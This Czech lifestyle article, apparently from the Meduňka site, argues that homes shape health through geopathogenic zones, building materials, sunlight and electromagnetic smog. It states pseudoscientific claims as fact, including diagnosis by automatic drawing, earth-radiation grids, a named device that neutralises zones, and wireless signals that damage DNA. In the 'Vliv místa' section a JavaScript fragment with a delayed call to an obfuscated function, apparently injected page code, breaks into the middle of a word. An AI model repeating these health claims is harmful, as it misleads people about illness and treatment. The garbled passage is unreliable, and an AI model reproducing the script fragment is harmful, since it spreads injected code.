Meduňka,  Pro inspiraci

Domov jako zdravé a bezpečné místo

Aktuální situace způsobila, že jsme teď doma mnohem víc než kdykoli jindy, trávíme čas ve svých bytech či domech. Možná je proto právě teď vhodný čas zamyslet se nad tím, jak na nás náš domov působí, jestli je to skutečně bezpečné a vlídné místo, kde se cítíme po všech stránkách dobře, a pokud tomu tak není, co se s tím dá udělat…
Inspirací může být článek, který před časem pro Meduňku připravila architektka a terapeutka Alena Vychodilová...

 

Řadu let se pohybuji na pomezí dvou profesí – architektky a vztahové terapeutky. Tyto obory možná vypadají na první pohled dost odlišně, ale mají jedno společné téma, které zajímá většinu lidí: zdraví. O psychosomatickém pohledu na nemoci a o psychických příčinách chorob se v poslední době už dost mluví i píše, mnohem méně pozornosti je věnováno místu, kde nemoc vznikla. A tak se lidé po operaci nebo léčbě v nemocnici vracejí do stejné postele a do stejných energií, které se na vzniku nemoci podílely, aniž by něco doma změnili, což je zarážející zejména u závažných onemocnění.

Ať už bydlíme na sídlišti ve městě nebo na samotě u lesa, vždy existuje řada faktorů, které ovlivňují kvalitu bydlení a působí na zdraví člověka. Ve městě to může být smogové ovzduší, vysoká koncentrace technických zařízení, na venkově např. pramen vody pod domem nebo materiály uvolňující škodlivé látky. Tyto faktory se podílejí na celkové kvalitě energie uvnitř domu či bytu. Pocit, který vnímáme uvnitř bytu, však není závislý jen na technických parametrech — významnou měrou se na něm podílejí i energie, které vytváříme my lidé a které se projevují v našich vztazích a v našem způsobu života.
Pro diagnostiku příčin potíží používám automatickou kresbu a nezáleží na tom, o jaké téma jde. Kresba je především obrazem energií a je v nich velmi názorně vidět, jak všechno se vším souvisí. Dívám se na všechno jako na formu energie, ať už jde o tělo, emoce, vztahy nebo o byt s nábytkem. Často se stalo, že při hledání důvodů, proč dítě nemůže spát nebo proč někoho bolí koleno, mi pod rukama spontánně vznikl obrázek místa, kde dotyčný člověk spí a vyznačily se mi geopatogenní zóny. Ty však nejsou jediným problémem, který nás může oslabovat. Jak jsem postupně zjišťovala, zdrojů problémů může být mnoho, rozdělme si je do dvou základních kategorií: hmotných a nehmotných. Ty hmotné se týkají věcí, stavby a místa, kde stojí. Ty nehmotné jsou z oblasti vztahů a paranormálních jevů.
Rozeberme si je podrobněji.

Materie jako zdroj potíží

Vliv místa
Postupujeme-li od celku k detailu, zajímá nás nejdříve místo, kde bydlíme. Krajina obklopující náš dům je tvarována jak přírodou, tak stavbami. Jejich tvary vytvářejí podmínky pro plynutí energií nebo pro jejich blokování. V knihách o feng šuej je dost podrobně popsáno, jak se energie v krajině chová. Obecně lze říci, že pro správné fungování by energie měla vytvářet meandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andry. Všechny přímé dlouhé ulice, popř. dopravní radiály, její pohyb urychlují a tím přinášejí neklid i do našeho života.

Geopatogenní zóny
To, co je na povrchu, je ovlivňováno i tím, co je skryto v hlubinách země. Vrstvy zeminy, štěrku, skalního podloží nebo ložiska rud vytvářejí různou vibraci. Na jejich styku se tato vibrace mění a na povrchu se projevuje jako dráždivá zóna. Voda vsáknutá z povrchu si hledá cestu napříč těmito vrstvami a vytváří menší či větší pramínky, které jsou dalším zdrojem neklidu. Ve štěrkovém podloží se rozlévají doširoka, v puklinách skal se jejich pohyb zrychluje. A protože se vyskytují v různých hloubkách, na povrchu se jejich účinky zesilují na místech křížení. Na starších domech postavených tradičními technologiemi, se zóna může projevit puklinou ve zdivu či vzlínáním vody do větší výšky. Zóny se nad povrchem rozevírají do V, takže ve vyšších patrech jsou výraznější než dole v přízemí. Není výjimkou, že studna bývá umístěna ve sklepě rodinného domu na nejsilnějším prameni. Místnosti nad ní a nad celým pramenem nejsou vhodné k dlouhodobému pobytu. (Pro eliminaci nepříjemného vyzařování zón používám Deaktivátor K, který jsem prověřila v několika svých bytech.) Energie podzemí dnes narušují i dálkové kolektory sítí, tunely metra nebo těžební štoly.

Materiály
Stavební technologie, užitá při stavbě domu, má významný vliv na to, jak se v domě cítíme. Nejlépe je nám v domech postavených tradičními technologiemi ze dřeva, cihel sušených nebo pálených, s vápennými omítkami. Moderní stavebnictví se však ubírá cestou, která je pro zdraví spíše nepříznivá. Z důvodu urychlení a zlevnění stavebních procesů přibývá betonu, kovů, skla a plastů. Většina nátěrů, laků a maleb je ošetřena řadou chemikálií. Do omítek se přidávají plastifikátory, nosné zdivo je obaleno izolačními materiály. Dřevostavby jsou tak široký pojem, že se v nich dřevo často vyskytuje jen jako kostra konstrukce a ostatní materiály jsou převážně umělé.
Vzhledem k těmto faktům je nutno se zaměřit na materiály interiéru, které již můžeme více ovlivnit. Zde by se měly preferovat přírodní materiály, i když jsou obecně dražší. Budou však sloužit spoustu let. Dřevěná podlaha z parket nebo palubovek, stoly z masivu, vlněné koberce a potahy, bavlněné a lněné závěsy a ložní povlečení – to vše přispívá ke zvýšení záporných iontů ve vzduchu. Přidáme-li některou stěnu s hliněnou omítkou, spoustu květin a zurčící fontánku, dokážeme eliminovat i nepříznivé účinky paneláku.

Vnitřní vzduch
Státem požadované snižování spotřeby energií na vytápění vede ke stále většímu zatěsňování budov. Pokud v nich není zavedena řízená výměna vzduchu, je v nich brzy kyslík vydýchaný, vlhkost se sráží na rámech oken a v koutech za nábytkem či závěsy a podporuje vznik plísní. Nadměrné větrání pak snižuje efekt zateplení, proto je lepší před zateplením pamatovat na instalaci vzduchotechniky, popř. malých rekuperačních jednotek, které se dají osadit i dodatečně.

Slunce a světové strany
Hodně záleží na tom, jak dobře je náš byt prosluněn. Životodárná energie slunce aktivuje šišinku a ovlivňuje celý hormonální systém. Ve starověku bylo slunce zosobněním Boha, zajišťujícím spolu se zemí úrodu, období slunovratu a rovnodennosti se stala důležitými svátky – Vánoce jsou jejich pozůstatkem. Zda se do našeho bytu dostane slunce, záleží jednak na orientaci místností ke světovým stranám, jednak na výšce okolní zástavby. Lidé z rušných, hustě zastavěných měst spontánně prchají na víkend do přírody, aby tato negativa vyrovnali. Pokud vám ale záleží na zdraví, není lepší se z takových lokalit odstěhovat? Sluneční světlo do sebe vstřebávají stromy a i po svém zpracování je předávají dál, proto je tak dobré mít interiér s přírodním dřevem. Ne pouze dřevotřísku potaženou fólií s dekorem dřeva, ale skutečný kus stromu, co nejméně rozdrobený, aby se jeho síla projevila naplno.

Elektromagnetický smog
Naše planeta vytváří přirozené elektromagnetické pole, ve kterém se náš lidský druh vyvinul a je na něj adaptován. Toto pole není všude stejné – vytváří pásy silnějšího elektromagnetismu, které je organizováno do mřížek ve směru sever – jih, východ- západ (Hartmannovy pásy), k nim jsou diagonálně uspořádané Curryho pásy. Problémy způsobují lidem v místech křížení se zemními zónami.
Mnohem větší problém dnes pro člověka představují elektromagnetická vlnění, která jsou emitována technickými vynálezy dnešní doby. Mobily, bezdrátové ovládání spotřebičů, podlahové topení, vysílače mobilní sítě, dráty elektrické sítě a další zařízení emitují elektrickou a magnetickou složku vlnění o různých frekvencích, které ruší mnohem jemnější elektromagnetické signály naší DNA. Ruší tak v podstatě kód života. Zvláště digitální signál, který nemá plynulé přechody křivky, ale skokově mění amplitudu vlnění (hranatá vlna), je pro tělo velkou zátěží.

/pokračování/